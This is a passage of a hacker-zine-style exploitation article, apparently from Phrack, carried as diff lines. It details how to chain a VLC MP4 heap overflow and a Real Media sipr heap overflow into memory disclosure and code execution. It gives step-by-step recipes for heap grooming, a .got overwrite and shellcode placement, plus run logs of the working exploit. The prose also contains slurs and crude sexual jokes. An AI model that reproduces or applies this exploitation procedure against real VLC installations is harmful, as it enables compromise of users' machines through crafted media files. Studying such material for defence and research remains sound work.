+'MP4_ReadBox_stts()' returning 0; the value that indicates a parsing
+failure. Adding the corrupted '0xa9xxx' boxes and the 'skcr' victim in
+the same container with an invalid 'stts' box, will result in the first
+being freed when the parsing error is detected and thus the attacker
+chosen heap regions to be freed*. VLC will continue reading the rest of
+the MP4 data as if nothing wrong has happened.
+
+  Note: It's crucial to understand that we shouldn't trigger a fatal
+  parsing error at this point since the unlink-like code will never be
+  reached. In fact, the process of doing that is slightly more complicated
+  than described in the previous paragraph; it's a minor detail that should
+  not be taken into account right now.
+
+
+----[ 3.5 MP4 exploitation sum up
+
+To sum up, for this first part of the exploitation process the attacker
+must perform the following steps:
+
+
+1 - Overwrite 'p_moov'
+
+  1a - Allocate several 'a9xxx' boxes that will stabilize the heap
+
+  1b - Allocate a 'cmov' box
+
+  1c - Allocate and fill an 'skcr' box. The 'skcr' handling code will
+  allocate an 'frma' structure (4 bytes) and write 12 bytes in its region
+  thus eventually overwriting 'cmov->p_moov'
+
+2 - Free and control 'p_root' contents
+
+  2a - Create a 'cmov' container
+
+  2b - Fill it with 2 '0xa9xxx' boxes
+
+  2c - Add an 'skcr' that will overwrite the adjacent '0xa9xxx' boxes. The
+  overwritten values should be the address of 'p_root' and a random 64
+  byte allocation in this specific order.
+
+  2d - Add an invalid 'stts' box that will force the parsing process
+  to fail, the 'cmov' and its children (two '0xa9xxx' and one 'skcr')
+  to be freed, the 'psz_text' members of 'MP4_Box_data_0xa9xxx_t' to be
+  passed to 'free()' and consequently, 'p_root' to be released.
+
+  2e - Add several 'chpl' boxes. Each one will result in 254 64byte
+  allocations with user controlled contents. Pray that jemalloc will give
+  'p_root' back to you (most likely).
+
+3 - Repeat step 2 as many times as you please to free as many pointers
+as you like (more on this later)
+
+4 - Properly pack everything together so that the 'unlink()' code
+is reached.
+
+
+One problem still remains; How can one know the address of 'p_root' in
+order to pass it to 'free()'? This is were an information leak would
+be useful. We need to find a bug that when properly exploited will
+reveal data of selected memory regions. Additionally, we need to seek
+the mechanisms by which this data will be returned to the attacker. The
+next section of this phile focuses on these two problems and the voodoo
+required to solve them.
+
+
+--[ 4 - Real Media 'DemuxAudioSipr()' heap overflow vulnerability
+
+----[ 4.1 - VLC as a transcoder
+
+Apart from a full blown media player, VLC can also work as a
+transcoder. Transcoding is the process of receiving numerous inputs,
+applying certain transformations on the input data and then sending the
+result to a set of outputs. This is, for example, what happens when you
+rip a DVD and convert it to an .avi stored on your hard disk. In its most
+simple use, transcoding may be used to duplicate an input stream to both
+your soundcard as well as an alternate output, for example, an RTP/HTTP
+network stream, so that other users can listen to the music you're
+currently listening; a mechanism invaluable for your favorite pr0n. For
+more information and some neat examples of using VLC in more advanced
+scenarios, you can have a look at the VideoLan wiki and especially at [5].
+
+Trying to find a way to leak memory from VLC, we carefully studied several
+examples from the wiki page at [5] and then started feeding VLC with a
+bunch of mysterious options; we even discovered a FreeBSD kernel 0day while
+doing so. After messing with the command line arguments for a couple of
+minutes we settled down to the following:
+
+
+vlc ass_traffic.mp4 :sout='#std{access=file,mux=raw,dst=dup.mp4}'
+
+
+This command, which is just a primitive usage of VLC's transcoding
+features, will just copy 'ass_traffic.mp4' to 'dup.mp4' thus duplicating
+the input stream to a standard file. Furthermore, if VLC is running in
+daemon mode, it is possible for the user to specify a different output
+MRL (Media Resource Location) per media file. For example, assume that
+VLC was started using the command line 'VLC --rc-host 127.0.0.1:8080';
+connecting to port 8080 using netcat and issuing the command...
+
+
+add /tmp/ass_traffic.mp4 :sout=#std{access=file,mux=raw,dst=/tmp/dup.mp4}
+
+
+...will, obviously, do the exact same thing. If we could discover an
+information leak, transcoding would be the perfect way of actually having
+VLC return leaked data back to us. For example, what if we could force VLC
+treat arbitrary memory addresses as simple sound information? If we manage
+to do that, then with the help of the transcoding features we could ask
+VLC to dump the memory range in question in a standard file in /tmp :)
+
+  Note: The truth is that we first focused on exploiting a vulnerability
+  that we could turn into a memory disclosure and then explored the
+  transcoding stuff. We decided to talk about transcoding first so that
+  the reader can keep it in mind while studying the RMF vulnerability
+  in the sections that follow.
+
+In the days that followed we thoroughly analyzed several public
+vulnerabilities. A specific commit diff in VLC's git caught our attention.
+It was a vulnerability regarding the Real Media format parser discovered by
+Hossein Lotfi [6]. Before actually touching the Real Media demuxer, a quick
+look in the media format itself is essential.
+
+
+----[ 4.2 - RMF? What's that?
+
+Source code for the real media demuxer can be found in
+modules/demux/real.c; the code itself is not very complex and can be easily
+analyzed in couple of hours. From what we've understood by studying the
+source, there are two kinds of Real Media files; the Real Audio (.ra)
+files, as well as the Real Media Format (.rmf) files. In fact, the two
+formats are quite similar with the one being a newer version of the other.
+Audio information is split in tracks, usually interleaved, so that a file
+may have several tracks each one encoded using a different audio codec.
+
+The vulnerability we will be analyzing can be triggered with a specially
+crafted RMF file that utilizes the Sipr audio codec (see [7] and [8]).
+
+The meta-information present in RMF files is split in various chunks;
+simple headers followed by their data. A special chunk, called MDPR
+(MeDia PRoperties) is used to encode information regarding a track in
+the RMF file (each track has its own associated MDPR header); its name,
+its duration, its title as well as the track identifier, a simple 32-bit
+integer.
+
+The sound information, the one you hear when playing a file, is split in
+packets, each one carrying the track ID for the track whose data it
+contains (as we have already mentioned, track data may be interleaved, so
+the file parser has to know what packet belongs to what track). The sipr
+codec goes further by allowing a packet to contain subpackets. When a
+packet with multiple subpackets is encountered, its contents are buffered
+until all subpackets have been processed. It's only then when the data
+in sent to your audio card or to any pending output streams ;)
+
+Sipr subpacket handling is where the mess begins...
+
+
+----[ 4.3 - Vulnerability details
+
+Every time a new packet is encountered in the input stream, VLC will check
+the track it belongs and figure out the audio codec for the track in
+question. Depending on this information, the appropriate audio demuxer is
+called. For sipr packets, 'DemuxAudioSipr()' is the function responsible
+for this task.
+
+
+/* modules/demux/real.c:788 */
+static void DemuxAudioSipr(..., real_track_t *tk, ...) {
+  ...
+
+  block_t *p_block = tk->p_sipr_packet;
+  ...
+
+  /* First occurance of a subpacket for this packet? Create a new block
+   * to buffer all the subpackets.
+   *
+   * Subpackets have a size equal to 'i_frame_size' and 'i_subpacket_h' is
+   * their number.
+   */
+  if(!p_block) {
+    /* (1) */
+    p_block = block_New(..., tk->i_frame_size * tk->i_subpacket_h);
+    ...
+
+    tk->p_sipr_packet = p_block;
+  }
+
+  /* (2) */
+  memcpy(p_block->p_buffer + tk->i_sipr_subpacket_count * tk->i_frame_size,
+    p_sys->buffer, tk->i_frame_size);
+  ...
+
+  /* Checks that all subpackets for this packet have been processed, if not
+   * returns to the demuxer.
+   */
+  if(++tk->i_sipr_subpacket_count < tk->i_subpacket_h)
+    return;
+  ...
+
+  /* All subpackets arrived; send data to all consumers. */
+  es_out_Send(p_demux->out, tk->p_es, p_block);
+}
+
+
+For now assume that 'block_New()', called at (1), is a simple call to
+'malloc()'. Obviously, setting 'i_subpacket_h' to 0 will result in a call
+very similar to 'malloc(0)'. As we have mentioned in our main jemalloc
+paper, a call to 'malloc(0)' returns a region of the smallest size class.
+If 'i_frame_size' is bigger than the minimal space reserved by 'malloc(0)',
+then the call to 'memcpy()' at (2) will result in neighboring heap
+allocations being corrupted (that simple ;p).
+
+
+----[ 4.4 - 'p_blocks' all over the place
+
+Since we have successfully identified the vulnerability, it is time
+to search for possible target structures. Before continuing, we must
+have a look at that 'block_t' structure used to buffer the subpackets;
+its definition can be found at include/vlc_block.h:101.
+
+
+typedef void (*block_free_t) (block_t *);
+
+struct block_t {
+  block_t      *p_next;
+  uint32_t     i_flags;
+  mtime_t      i_pts;
+  mtime_t      i_dts;
+  mtime_t      i_length;
+  unsigned     i_nb_samples;
+  int          i_rate;
+  size_t       i_buffer;
+  uint8_t      *p_buffer;
+  block_free_t pf_release;
+};
+
+
+I know what you're probably thinking; stop staring at that function
+pointer ;) Yes we can very easily overflow it and consequently gain direct
+code execution. Nevertheless, we decided not to take the easy road;
+after all, we are only interested in forcing VLC leak memory contents
+back to us. Assume function pointers have not been discovered yet ;p
+The structure still looks quite promising; notice how 'i_buffer', the
+size of the audio data pointed by the 'p_buffer' pointer, lies before
+'p_buffer' itself... But what exactly is that 'p_buffer' anyway? When
+and how is it allocated?
+
+Here's another interesting story regarding audio blocks. Having a look
+at src/misc/block.c, line 99, in function 'block_Alloc()' reveals that
+block headers always lie before the data pointed by 'p_buffer'. When,
+for example, the user requests a block of 16 bytes, 'block_Alloc()' will
+add 16 to the metadata overhead, say N bytes, thus eventually allocating
+16 + N bytes. The 'p_data' pointer will then set to point to the start
+of the actual buffer, right after the 'block_t' header as depicted below.
+
+
+                     p_buffer
+                     .-----.
+                     |     |
+                     |     v
+                .---------.----------------------.
+                | block_t |  ... audio data ...  |
+                '---------'----------------------'
+
+
+The relevant code is shown below:
+
+
+struct block_sys_t {
+  block_t self;
+  size_t  i_allocated_buffer;
+  uint8_t p_allocated_buffer[];
+};
+...
+
+#define BLOCK_ALIGN   16
+...
+
+#define BLOCK_PADDING 32
+...
+
+block_t *block_Alloc(size_t i_size) {
+  ...
+  block_sys_t *p_sys;
+  uint8_t *buf;
+
+#define ALIGN(x) (((x) + BLOCK_ALIGN - 1) & ~(BLOCK_ALIGN - 1))
+
+  /* (1) */
+  const size_t i_alloc = sizeof(*p_sys) + BLOCK_ALIGN +
+    (2 * BLOCK_PADDING) + ALIGN(i_size);
+
+  p_sys = malloc(i_alloc);
+  ...
+
+  /* 'buf' is assigned to 'block_t->p_buffer' by 'block_Init()' */
+  buf = (void *)ALIGN((uintptr_t)p_sys->p_allocated_buffer);
+  buf += BLOCK_PADDING;
+  block_Init(&p_sys->self, buf, i_size);
+  ...
+
+  return &p_sys->self;
+}
+
+
+Taking a look back at 'DemuxAudioSipr()', we can see that if
+'i_subpacket_h' is set to 0, then 'block_New()', a macro that is
+substituted with 'block_Alloc()', results in the latter receiving a
+value for 'i_size' equal to 0. Setting 'i_size' to 0 at (1), results in
+'i_alloc' being assigned the value 136. Now do the math; 136 is slightly
+larger than 128 so, it will be serviced by jemalloc's bin for 192-byte
+regions. 192 - 136 = 56; 56 is the size margin for the parameter passed
+to 'block_Alloc()'; for the blocks to be placed one next to the other,
+they must reside in the same size class, so, we must make sure the total
+length of the subpackets does not exceed 56. For a packet containing
+two subpackets, a wise choice is to set 'i_frame_size' to 20, so that 2 *
+20 (< 56) plus the overhead is also serviced by bin-192. Unfortunately,
+'i_frame_size' cannot take arbitrary values; it can only get a set of
+predefined ones with 20 being the smallest.
+
+Beautiful! Since 'block_t' allocations are always accompanied by their
+buffer, it means that the 'memcpy()' call at (2) in 'DemuxAudioSipr()',
+when writing past the boundaries of the victim buffer, may actually
+overwrite the header of an adjacent audio block; its 'p_buffer', its
+'i_buffer' and even its function pointer (but let's ignore this fact for
+now; abusing the function pointer is trivial and we decided not to deal
+with it).
+
+Now, a few more things to note:
+
+1 - We know that if one packet has two, for example, subpackets, then
+its 'p_block' will be alive until all subpackets have been processed;
+when they are no longer needed, they will be freed resulting in a small
+hole in the heap. Obviously, the lifetime of a 'p_block' is directly
+related to the number of its subpackets.
+
+2 - Checking at how 'DemuxAudioSipr()' works, reveals that a packet
+with 0 subpackets is treated as if it had 1 subpacket. The 'memcpy()'
+call at (2) will overflow the adjacent heap regions and then, when its
+processing has finished, the packet will be freed by 'es_out_Send()'.
+
+By combining the facts above, turns out we can:
+
+1 - Use the RMF metadata (MDPR chunks) to define two tracks. Both
+tracks must use the sipr audio codec. Each packet of the first must
+have 2 subpackets and each packet of the second 0 subpackets for the
+vulnerability to be triggered.
+
+2 - Force VLC play the first subpacket of a packet of the first track. A
+new 'block_t' will be allocated. In the diagram below, 't1s1' stands for
+'track 1 subpacket 1'.
+
+
+                .---------.-------.
+                | block_t |  t1s1 |
+                '---------'-------'
+
+
+3 - Force VLC to play the packet of the second track; the one that has
+0 subpackets. A new 'block_t' will eventually be allocated. We have
+to specially prepare the heap so that the new block is placed directly
+behind the one initialized at step 2.
+
+
+                .---------.------..---------.------.
+                | block_t | t2s0 || block_t | t1s1 |
+                '---------'------''---------'------'
+
+
+An overflow will take place thus overwriting the block header of the
+block allocated in the previous step. We are interested in overwriting
+the 'p_buffer' to make it point to a memory region of our choice and
+'i_buffer' to the number of bytes we want to be leaked.
+
+4 - Feed VLC with the second subpacket for the first track. Since the
+first subpacket was processed at step 2, the old 'block_t' will be
+used. If everything goes fine, its 'p_buffer' will point where we set
+it to and 'i_buffer' will contain a size of our choice. The 'memcpy()'
+call at (2) in 'DemuxAudioSipr()' will write 'i_frame_size' bytes at our
+chosen address thus trashing the memory a bit, but when 'es_out_Send()'
+is called, 'i_buffer' bytes starting at the address 'p_buffer' points to
+will be sent to the soundcard or any output stream requested by the user!
+
+  Note: Well yeah it wasn't that simple... 'es_out_Send()' calls a hell of
+  other functions to process the audio blocks, break them down in smaller
+  blocks, forward them to the output streams and so on. Debugging this
+  process was a very tiresome task; it became apparent that the target,
+  the overflown 'block_t' header had to obey to certain rules so that
+  it wasn't discarded. For example, all packets carry a timestamp;
+  the timestamp of the overflown block must be within a range of valid
+  timestamps, otherwise it's considered stale and dropped!
+
+The following logs correspond to one of our early tests; we used a
+specially crafted .rmf file to leak 65k of data starting at the binary's
+.data section.
+
+      [hk@lsd ~/src/vlc_exp/leak]$ cat youporn.sh
+      vlc leak.rmf :sout='#std{access=file,mux=raw,dst=leaked_data.rmf}' \
+        vlc://quit
+
+      [hk@lsd ~/src/vlc_exp/leak]$ source youporn.sh
+      VLC media player 1.1.8 The Luggage (revision exported)
+      ...
+      [hk@lsd ~/src/vlc_exp/leak]$ ls -lah leaked_data.rmf
+      -rwxr-xr-x  1 hk  hk   128K Mar 31 22:27 leaked_data.rmf
+
+We got back 128k which is about twice as much as we requested. In fact,
+the useful data is 65k; it just happens that it's written in the output
+file twice (minor detail related to block buffering).
+
+Careful readers would have probably noticed that we took for granted that
+the victim block will be allocated right before the target. Such a result
+can easily be achieved. The technique we use in our exploit is very
+similar to one of the techniques used in browser exploitation. Briefly,
+we create several tracks (more than 2000) holding packets of 2 subpackets
+of 20 bytes each so that all packets end up being allocated in bin-192. We
+then force the release of two consecutive allocations thus creating two
+adjacent holes in the heap. Then, by following what was said so far,
+we can achieve a reliable information disclosure. Our tests show that
+we can repeat this process around 40 times before VLC crashes (yet this
+is only statistics, beautiful Greek statistics ;p).
+
+
+----[ 4.5 - RMF summary
+
+It's now time to sum up the information leak process. For a successful
+information disclosure, the attacker must perform the following steps:
+
+1 - Create 2000 + 1 + 1 tracks. 2000 will be used for heap spraying,
+1 will act as the target and 1 as the victim. The lots of allocations
+will probably result in a new magazine being populated thus guaranteeing
+that new allocations will be returned in the reverse memory order.
+
+2 - Force the deallocation of two packets belonging to two consecutive
+tracks. Two adjacent holes will be created. The packet lower in memory
+must be freed first.
+
+3 - Play the first subpacket of the target track. The hole in the higher
+address will be assigned to the new block.
+
+4 - Play the packet of the victim track. The new block will be given the
+lower heap hole and the overflow will reach the block allocated at step 3.
+
+5 - Play the second subpacket of the target track. The memory we want
+to read will be trashed by 20 bytes (= frame size) and then returned in
+the output stream.
+
+6 - Watch the epic faggotry evolving in front of your eyes ;)
+
+
+--[ 5 - Building a reliable exploit
+
+----[ 5.1 - Overall process
+
+Building a reliable local exploit involves combining all the facts
+and finding a way to locate, within the target process, all pieces of
+information required to achieve code execution. Remember that we don't
+want the user having to manually find any return addresses, return
+locations and so on. The exploit must be autonomous and self contained;
+all required information must be automatically detected.
+
+When it comes to the MP4 vulnerability, things are pretty straightforward;
+we just need to figure out where 'p_root' is and then free it.
+Additionally, we need to figure out what value 'p_moov' must be overwritten
+with (i.e. the address of an appropriate .got entry). MP4 exploitation is
+100% reliable; once we have found the values of those two parameters, code
+execution is matter of feeding VLC with a specially crafted MP4 file. For
+more information the reader can have a look at the attached source code and
+more specifically at 'mp4.py'; a Python class used to create those special
+MP4 files that can crash VLC as well as innocent ones that cause no
+problems. The latter are used to force VLC load 'libmp4_plugin.so' during
+the very first step of the exploitation process.
+
+Briefly the exploit we developed performs the following steps:
+
+1 - Forces VLC to play an innocent MP4 file so that the target plugin
+is loaded.
+
+2 - Parses the ELF headers of the VLC binary in order to locate the
+absolute address of its .got section.
+
+3 - Uses a specially crafted RMF file to leak 65k starting at the address
+of the binary's .got.
+
+4 - The second entry in the .got table points to the linkmap; a linked
+list that keeps track of the loaded libraries populated by the loader
+on each call to 'dlopen()'. Each entry holds the name of a library, the
+address it's mapped at and so on. We proceed by leaking 1MB of data
+starting from the address of the first linkmap entry.
+
+5 - Step 4 is repeated until 'libmp4_plugin.so' is detected in the leaked
+data. VLC loads more than 100 libraries; there's no need to locate them
+all. Once we got the MP4 plugin entry, we can figure out where exactly
+it has been loaded.
+
+6 - By statically inspecting the MP4 plugin and by using the information
+collected at step 5, we can find the absolute address of its .got. The MP4
+vulnerability is triggered within this .so; consequently the overwrite
+must take place within its local .got.
+
+7 - The relocation entries, the string table and the symbol table
+indicated by the .dynamic section of the MP4 plugin can be properly
+combined to figure out what .got entry corresponds to what symbol name. We
+choose to overwrite the .got entry for 'memset()' (more on this later).
+The absolute address of the 'memset()' .got entry is then calculated
+and used as the value that will be written in 'p_moov'.
+
+8 - A set of possible addresses for 'p_root' is created by leaking and
+analyzing specific heap regions. This step is further analyzed later.
+
+9 - A final MP4 file is created. The MP4 file frees all 'p_root'
+candidates, uses 'chpl' boxes containing the shellcode to force jemalloc
+give the original 'p_root' region back and lands VLC on the 'unlink()'
+style pointer exchange. The address of 'p_root', which now contains user
+supplied data, is written in the .got entry of 'memset()'.
+
+10 - Shellcode is executed, much rejoicing is had ;)
+
+So why did we choose to hook 'memset()'? Turns out that once the MP4 file
+parsing has finished and the 'unlink()' tyle code has been triggered,
+VLC calls 'MP4_BoxDumpStructure()' to print the layout of the MP4 file
+(this is always done by default; no verbose flags required). Since we
+have corrupted the boxes, 'MP4_BoxDumpStructure()' may access invalid
+memory and thus segfault. To avoid such a side effect, we have to hook
+the first external function call. As shown below, this call corresponds to
+'memset()' which suits us just fine ;)
+
+
+static void __MP4_BoxDumpStructure(..., MP4_Box_t *p_box, ...)
+{
+  MP4_Box_t *p_child;
+
+  if( !i_level )
+  {
+    ...
+  }
+  else
+  {
+    ...
+    memset(str, ' ', sizeof(str));
+  }
+  ...
+
+  p_child = p_box->p_first;
+  while(p_child)
+  {
+    __MP4_BoxDumpStructure(..., p_child, ...);
+    p_child = p_child->p_next;
+  }
+}
+
+
+----[ 5.2 - Detecting 'p_root' address candidates
+
+At first we thought that this would be the easier part of the exploitation
+process; it turned out that it was actually the most difficult. Our first
+idea was to play an MP4 file several times and then leak memory in the
+hope that certain 'MP4_Box_t' signatures may be present somewhere in the
+heap. Unfortunately, the 64-byte allocations used by the MP4 plugin, are
+later used by the RMF parser thus destroying any useful evidence. After
+long nights and lots of tests, we came up with the following technique
+which turned out to be successful:
+
+Briefly, we do the following:
+
+1 - We leak 65k of data by overwriting 'i_buffer' and leaving 'p_buffer'
+at its present value. This way we read memory contents starting from
+the address that the victim 'p_block' is located.
+
+2 - As we have already discussed, the 'p_blocks' created by our RMF file
+are 192 bytes long, so, they lie within runs serviced by bin-192. Leaking
+data from where 'p_buffer' points, results in neighboring runs being
+leaked as well.
+
+3 - In our jemalloc article we mentioned that (a) runs are PAGE_SIZE
+aligned and (b) run headers start with a pointer to the corresponding
+bin. We analyze the leaked data and try to locate PAGE_SIZE aligned
+addresses that start with something that looks like a bin pointer
+(0x0804yyyy, some bytes after the main binary's .bss section).
+
+4 - We leak 65k starting from the binary's .bss section. The bins array
+of the main arena lies somewhere around. We analyze the data and locate
+the address of bin-64.
+
+5 - We leak about 7-8MB of commonly used heap regions. Since we now
+know the address of bin-64, we try to locate all runs that start with
+a pointer pointing at it, that is, runs that contain 64byte regions.
+
+6 - All regions in these runs will be freed by our MP4 file; 'p_root'
+is probably one of them.
+
+
+--[ 6 - Demonstration
+
+An art of exploitation paper serves nothing without the proper show off ;)
+This section was specially prepared to be hard sex for your eyes. We were
+very careful and, in fact, we spent many hours trying to figure out the
+leetest shellcode to use, but we couldn't come up with something more
+perfect than 'int3'.
+
+
+[hk@lsd ~]$ gdb -q vlc
+Reading symbols from xxx/bin/vlc...done.
+(gdb) run --rc-host 127.0.0.1:8080
+Starting program: xxx/bin/vlc --rc-host 127.0.0.1:8080
+...
+
+
+Let's run the exploit. The actual output may differ since the logs shown
+below do not correspond to the latest version of our code (oh and by
+the way, we are not fucking Python experts).
+
+
+[hk@lsd ~]$ python main.py
+usage: main.py <vlc_install_prefix> [<rc_port>]
+[hk@lsd ~]$ python main.py xxx/ 8080
+[~] Forcing VLC to load libmp4_plugin.so
+[~] Playing MP4 file 1 times
+.ok
+[~] .got address for VLC binary is 0x0804ad60
+[~] .got address for MP4 plugin is 0x00025e1c
+[~] Index of memset() in MP4's .got is 35
+[~] Requesing memory leak of .got
+[~] Leaking 65535 bytes 0x0804ad60-0x0805ad5f
+[~] Summary of our memory view
+  001 0x0804ad60-0x0805ad4a (65515 bytes)
+[~] Got 65515 bytes of useful data
+[~] Saving .got data in got.bin
+[~] Guessed linkmap address is 0x28088000
+[~] Requesting memory leak of linkmap
+[~] Leaking 4194304 bytes 0x28086000-0x28486000
+[~] Summary of our memory view
+  001 0x0804ad60-0x0805ad4a (65515 bytes)
+  002 0x28086000-0x28485feb (4194284 bytes)
+[~] Got 4194284 bytes of useful data
+[~] Saving linkmap partial data in linkmap-0x28086000.bin
+  001 0x08048000-0x00000000 unknown-0x08048000-0x00000000
+  002 0x2808e000-0x2817a084 libc.so.7
+  003 0x281a5000-0x281b95b4 libvlc.so.7
+  004 0x281bd000-0x28286234 libvlccore.so.4
+  005 0x282a7000-0x282e3c14 libdbus-1.so.3
+  006 0x282ed000-0x282f0814 librt.so.1
+  007 0x282f2000-0x28305a84 libm.so.5
+  008 0x2830c000-0x2831d334 libthr.so.3
+  009 0x28321000-0x28327d44 libintl.so.9
+  010 0x2832a000-0x28343eb4 libiconv.so.3
+  011 0x2842c000-0x2842ea84 liboss_plugin.so
+  012 0x28430000-0x28431734 libmemcpymmxext_plugin.so
+  013 0x28433000-0x284401b4 libaccess_bd_plugin.so
+  014 0x28442000-0x28443764 libaccess_mmap_plugin.so
+  015 0x28445000-0x28447c64 libfilesystem_plugin.so
+  016 0x2844a000-0x2844bc24 libdecomp_plugin.so
+  017 0x2844d000-0x2844ebd4 libstream_filter_rar_plugin.so
+  018 0x28450000-0x284563e4 libzip_plugin.so
+  019 0x28458000-0x28464a04 libz.so.5
+  020 0x2846a000-0x2846b244 libstream_filter_record_plugin.so
+  021 0x2846d000-0x2847e994 libplaylist_plugin.so
+  022 0x28482000-0x28483414 libxml_plugin.so
+  023 0x29300000-0x29402fb4 libxml2.so.5
+  024 0x28485000-0x2848a9c4 libhotkeys_plugin.so
+  025 0x2848d000-0x2848e384 libinhibit_plugin.so
+  026 0x28490000-0x28490fb4 libsignals_plugin.so
+  027 0x28493000-0x28494bd4 libglobalhotkeys_plugin.so
+  028 0x28497000-0x284982c4 libxcb-keysyms.so.1
+  029 0x2849a000-0x284af254 libxcb.so.2
+  030 0x284b2000-0x284b3754 libXau.so.6
+  031 0x284b5000-0x284b7b14 libXdmcp.so.6
+  032 0x284ba000-0x284ba574 libpthread-stubs.so.0
+  033 0x284bc000-0x284c43f4 liboldrc_plugin.so
+  034 0x284c8000-0x284e9da4 libmp4_plugin.so
+[~] MP4 plugin is mmap'ed at 0x284c8000-0x284e9da4
+[~] Absolute .got address for MP4 plugin at 0x284ede1c
+[~] .got address of memset() is 0x284edea8
+[~] .bss address for VLC binary is 0x0804adec
+[~] Searching for bin[] address candidates
+[~] Leaking 131070 bytes from current location
+[~] Got 131050 bytes of useful data
+0x0804c0a0...ok
+[~] Leaking 65535 bytes 0x0804adec-0x0805adeb
+[~] Summary of our memory view
+  001 0x0804ad60-0x0805ad4a (65515 bytes)
+  002 0x28086000-0x28485feb (4194284 bytes)
+  003 0x0804adec-0x0805add6 (65515 bytes)
+[~] Got 65515 bytes of useful data
+[~] bin-64 runcur at 0x2891a000, bin address 0x0804bfd8
+[~] Playing MP4 file 16 times
+................ok
+[~] Leaking 7340032 bytes 0x28700000-0x28e00000
+[~] Summary of our memory view
+  001 0x0804ad60-0x0805ad4a (65515 bytes)
+  002 0x28086000-0x28485feb (4194284 bytes)
+  003 0x0804adec-0x0805add6 (65515 bytes)
+  004 0x28700000-0x28dfffeb (7340012 bytes)
+[~] Got 7340012 bytes of useful data
+[~] Trying to locate target runs for bin-64 at 0x0804c0a0
+  64byte region run at 0x28912000
+  64byte region run at 0x28919000
+  64byte region run at 0x2891a000
+  64byte region run at 0x28933000
+  64byte region run at 0x289fc000
+  64byte region run at 0x289fd000
+  64byte region run at 0x289fe000
+  64byte region run at 0x28b32000
+  64byte region run at 0x28b33000
+  64byte region run at 0x28b34000
+  64byte region run at 0x28b36000
+  64byte region run at 0x28b37000
+  64byte region run at 0x28b38000
+  64byte region run at 0x28b39000
+  64byte region run at 0x28b3a000
+  64byte region run at 0x28b3b000
+  64byte region run at 0x28bac000
+  64byte region run at 0x28bad000
+  64byte region run at 0x28bae000
+  64byte region run at 0x28baf000
+[~] Constructing final MP4 payload
+[~] Will free the following memory regions
+0x28912080...0x289120c0...0x28912100...0x28912140...0x28912180...
+0x289121c0...0x28912200...0x28912240...0x28912280...0x289122c0...
+0x28912300...0x28912340...0x28912380...0x289123c0...0x28912400...
+0x28912440...0x28912480...0x289124c0...0x28912500...0x28912540...
+0x28912580...0x289125c0...0x28912600...0x28912640...0x28912680...
+0x289126c0...0x28912700...0x28912740...0x28912780...0x289127c0...
+0x28912800...0x28912840...0x28912880...0x289128c0...0x28912900...
+0x28912940...0x28912980...0x289129c0...0x28912a00...0x28912a40...
+0x28912a80...0x28912ac0...0x28912b00...0x28912b40...0x28912b80...
+0x28912bc0...0x28912c00...0x28912c40...0x28912c80...0x28912cc0...
+0x28912d00...0x28912d40...0x28912d80...0x28912dc0...0x28912e00...
+0x28912e40...0x28912e80...0x28912ec0...0x28912f00...0x28912f40...
+0x28912f80...0x28912fc0...0x28919080...0x289190c0...0x28919100...
+0x28919140...0x28919180...0x289191c0...0x28919200...0x28919240...
+0x28919280...0x289192c0...0x28919300...0x28919340...0x28919380...
+0x289193c0...0x28919400...0x28919440...0x28919480...0x289194c0...
+0x28919500...0x28919540...0x28919580...0x289195c0...0x28919600...
+0x28919640...0x28919680...0x289196c0...0x28919700...0x28919740...
+0x28919780...0x289197c0...0x28919800...0x28919840...0x28919880...
+0x289198c0...0x28919900...0x28919940...0x28919980...0x289199c0...
+0x28919a00...0x28919a40...0x28919a80...0x28919ac0...0x28919b00...
+0x28919b40...0x28919b80...0x28919bc0...0x28919c00...0x28919c40...
+0x28919c80...0x28919cc0...0x28919d00...0x28919d40...0x28919d80...
+0x28919dc0...0x28919e00...0x28919e40...0x28919e80...0x28919ec0...
+0x28919f00...0x28919f40...0x28919f80...0x28919fc0...0x2891a080...
+0x2891a0c0...0x2891a100...0x2891a140...0x2891a180...0x2891a1c0...
+0x2891a200...0x2891a240...0x2891a280...0x2891a2c0...0x2891a300...
+0x2891a340...0x2891a380...0x2891a3c0...0x2891a400...0x2891a440...
+0x2891a480...0x2891a4c0...0x2891a500...0x2891a540...0x2891a580...
+0x2891a5c0...0x2891a600...0x2891a640...0x2891a680...0x2891a6c0...
+0x2891a700...0x2891a740...0x2891a780...0x2891a7c0...0x2891a800...
+0x2891a840...0x2891a880...0x2891a8c0...0x2891a900...0x2891a940...
+0x2891a980...0x2891a9c0...0x2891aa00...0x2891aa40...0x2891aa80...
+0x2891aac0...0x2891ab00...0x2891ab40...0x2891ab80...0x2891abc0...
+0x2891ac00...0x2891ac40...0x2891ac80...0x2891acc0...0x2891ad00...
+0x2891ad40...0x2891ad80...0x2891adc0...0x2891ae00...0x2891ae40...
+0x2891ae80...0x2891aec0...0x2891af00...0x2891af40...0x2891af80...
+0x2891afc0...0x28933080...0x289330c0...0x28933100...0x28933140...
+0x28933180...0x289331c0...0x28933200...0x28933240...0x28933280...
+0x289332c0...0x28933300...0x28933340...0x28933380...0x289333c0...
+0x28933400...0x28933440...0x28933480...0x289334c0...0x28933500...
+0x28933540...0x28933580...0x289335c0...0x28933600...0x28933640...
+0x28933680...0x289336c0...0x28933700...0x28933740...0x28933780...
+0x289337c0...0x28933800...0x28933840...0x28933880...0x289338c0...
+0x28933900...0x28933940...0x28933980...0x289339c0...0x28933a00...
+0x28933a40...0x28933a80...0x28933ac0...0x28933b00...0x28933b40...
+0x28933b80...0x28933bc0...0x28933c00...0x28933c40...0x28933c80...
+0x28933cc0...0x28933d00...0x28933d40...0x28933d80...0x28933dc0...
+0x28933e00...0x28933e40...0x28933e80...0x28933ec0...0x28933f00...
+0x28933f40...0x28933f80...0x28933fc0...0x289fc080...0x289fc0c0...
+0x289fc100...0x289fc140...0x289fc180...0x289fc1c0...0x289fc200...
+0x289fc240...0x289fc280...0x289fc2c0...0x289fc300...0x289fc340...
+0x289fc380...0x289fc3c0...0x289fc400...0x289fc440...0x289fc480...
+0x289fc4c0...0x289fc500...0x289fc540...0x289fc580...0x289fc5c0...
+0x289fc600...0x289fc640...0x289fc680...0x289fc6c0...0x289fc700...
+0x289fc740...0x289fc780...0x289fc7c0...0x289fc800...0x289fc840...
+0x289fc880...0x289fc8c0...0x289fc900...0x289fc940...0x289fc980...
+0x289fc9c0...0x289fca00...0x289fca40...0x289fca80...0x289fcac0...
+0x289fcb00...0x289fcb40...0x289fcb80...0x289fcbc0...0x289fcc00...
+0x289fcc40...0x289fcc80...0x289fccc0...0x289fcd00...0x289fcd40...
+0x289fcd80...0x289fcdc0...0x289fce00...0x289fce40...0x289fce80...
